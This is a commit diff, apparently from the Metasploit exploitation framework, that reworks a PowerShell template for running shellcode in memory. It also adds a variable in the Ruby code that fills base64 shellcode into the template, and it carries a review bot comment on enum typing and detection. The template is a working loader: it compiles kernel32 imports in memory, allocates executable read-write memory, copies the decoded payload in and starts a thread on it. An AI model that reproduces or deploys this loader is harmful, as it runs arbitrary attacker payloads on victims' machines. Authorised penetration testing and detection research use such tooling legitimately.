Dont tidy up template yet
parent
f1959f5313
commit
1f9b452425
|
@ -1,24 +1,30 @@
|
|||
Set-StrictMode -Version 2
|
||||
$%{var_syscode} = @"
|
||||
using System;
|
||||
using System.Runtime.InteropServices;
|
||||
namespace %{var_kernel32} {
|
||||
public class func {
|
||||
[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr a,uint b,uint c,uint d);
|
||||
[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr e,uint f,IntPtr g,IntPtr h,uint i,IntPtr j);
|
||||
[DllImport("kernel32.dll")]public static extern int WaitForSingleObject(IntPtr k,int l);
|
||||
}
|
||||
}
|
||||
using System;
|
||||
using System.Runtime.InteropServices;
|
||||
namespace %{var_kernel32} {
|
||||
public class func {
|
||||
[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
|
||||
[Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
|
||||
[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
|
||||
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
|
||||
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
|
||||
[DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
|
||||
}
|
||||
}
|
||||
"@
|
||||
$%{var_codeProvider}=New-Object Microsoft.CSharp.CSharpCodeProvider
|
||||
$%{var_compileParams}=New-Object System.CodeDom.Compiler.CompilerParameters
|
||||
$%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll",[PsObject].Assembly.Location))
|
||||
$%{var_compileParams}.GenerateInMemory=$True
|
||||
$%{var_output}=$%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams},$%{var_syscode})
|
||||
[Byte[]]$%{var_code}=[System.Convert]::FromBase64String("%{b64shellcode}")
|
||||
$%{var_baseaddr}=[%{var_kernel32}.func]::VirtualAlloc(0,$%{var_code}.Length+1,0x3000,0x40)
|
||||
if([Bool]!$%{var_baseaddr}){$global:result=3;return}
|
||||
[System.Runtime.InteropServices.Marshal]::Copy($%{var_code},0,$%{var_baseaddr},$%{var_code}.Length)
|
||||
[IntPtr] $%{var_threadHandle}=[%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
|
||||
if([Bool]!$%{var_threadHandle}){$global:result=7;return}
|
||||
[%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle},0xFFFFFFFF)
|
||||
|
||||
$%{var_codeProvider} = New-Object Microsoft.CSharp.CSharpCodeProvider
|
||||
$%{var_compileParams} = New-Object System.CodeDom.Compiler.CompilerParameters
|
||||
$%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
|
||||
$%{var_compileParams}.GenerateInMemory = $True
|
||||
$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
|
||||
|
||||
[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
|
||||
|
||||
$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
|
||||
if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }
|
||||
[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length)
|
||||
[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
|
||||
if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
|
||||
$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)
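Review bot: The `[Flags]` attribute is applied to all three new enums, but only `AllocationType` is ever combined bitwise (the `-bOr` in the `VirtualAlloc` call). `MemoryProtection` and `Time` each hold a single value, and `Infinite = 0xFFFFFFFF` is a sentinel rather than a bit set, so `[Flags]` is misleading on those two. The typing is also inconsistent: `WaitForSingleObject` now declares `Time dwMilliseconds`, while `VirtualAlloc` still declares `uint flAllocationType, uint flProtect` and relies on PowerShell converting the enum arguments. Either declare those parameters with the enum types or keep all three as `uint`. For anyone reading this from the detection side, the rename is cosmetic: the script still requests a committed PAGE_EXECUTE_READWRITE (0x40) region, copies the decoded bytes into it and starts a thread there, so the observable API sequence is unchanged.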
|
||||
|
|
|
@ -884,7 +884,7 @@ def self.to_vba(framework,code,opts={})
|
|||
|
||||
hash_sub = rig.to_h
|
||||
hash_sub[:shellcode] = Rex::Text.to_csharp(code, 100, rig[:var_bytearray])
|
||||
|
||||
|
||||
return read_replace_script_template("to_mem.aspx.template", hash_sub)
|
||||
end
|
||||
|
||||
|
@ -898,6 +898,7 @@ def self.to_vba(framework,code,opts={})
|
|||
rig.init_var(:var_codeProvider)
|
||||
rig.init_var(:var_compileParams)
|
||||
rig.init_var(:var_syscode)
|
||||
rig.init_var(:var_temp)
|
||||
|
||||
hash_sub = rig.to_h
|
||||
hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)
|
||||
|
|